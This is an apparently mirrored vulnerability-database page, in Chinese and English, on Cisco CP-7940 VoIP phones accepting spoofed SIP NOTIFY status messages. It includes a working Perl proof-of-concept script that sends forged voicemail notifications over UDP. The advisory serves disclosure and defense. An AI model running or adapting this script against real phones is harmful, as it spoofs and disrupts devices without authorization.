Cisco VoIP Phone CP-7940 3.x – Spoofed SIP Status Message Handling

Cisco VoIP Phone CP-7940 3.x – Spoofed SIP Status Message Handling

漏洞ID 1055225 漏洞类型
发布时间 2005-07-06 更新时间 2005-07-06
图片[1]-Cisco VoIP Phone CP-7940 3.x – Spoofed SIP Status Message Handling-安全小百科CVE编号 N/A
图片[2]-Cisco VoIP Phone CP-7940 3.x – Spoofed SIP Status Message Handling-安全小百科CNNVD-ID N/A
漏洞平台 Hardware CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/25949
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/14174/info

Multiple Vendor VoIP Phones handle spoofed SIP status messages in an improper manner. This issue could potentially lead a to a denial of service condition against a server.

The issue arises because the affected phones do not verify the 'Call-ID', 'tag' and 'branch' headers of NOTIFY messages and process spoofed status messages instead of rejecting the messages.

Cisco 7940 and 7960 and Grandstream BT 100 phones are affected by this issue. Other vendors may be vulnerable as well. 

#!/usr/bin/perl
# SIP NOTIFY POC by [email protected]
use Socket;
SendSIPTo("10.0.0.1"); # IP of the phone

sub SendSIPTo{
$phone_ip = shift;
$MESG="NOTIFY sip:chaos@$phone_ip:5060 SIP/2.0
Via: SIP/2.0/UDP 1.2.3.4:5060;branch=000000000000000
From: "drfrancky" <sip:[email protected]>;tag=000000000
To:  <sip:chaos@$phone_ip>
Contact: <sip:[email protected]>
Event: message-summary
Call-ID: [email protected]
CSeq: 102 NOTIFY
Content-Type: application/simple-message-summary
Content-Length: 37
Messages-Waiting: yes
Voicemail: 3/2";

$proto = getprotobyname('udp');
socket(SOCKET, PF_INET, SOCK_DGRAM, $proto) ;
$iaddr = inet_aton("0.0.0.0");
$paddr = sockaddr_in(5060, $iaddr);
bind(SOCKET, $paddr) ;
$port=5060;
$hisiaddr = inet_aton($phone_ip) ;
$hispaddr = sockaddr_in($port, $hisiaddr);
send(SOCKET, $MESG, 0,$hispaddr ) || warn "send $host $!n";
}

相关推荐: HP Web Jetadmin Multiple Vulnerabilities

HP Web Jetadmin Multiple Vulnerabilities 漏洞ID 1098483 漏洞类型 Unknown 发布时间 2004-04-27 更新时间 2004-04-27 CVE编号 N/A CNNVD-ID N/A 漏洞平台 N/A…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享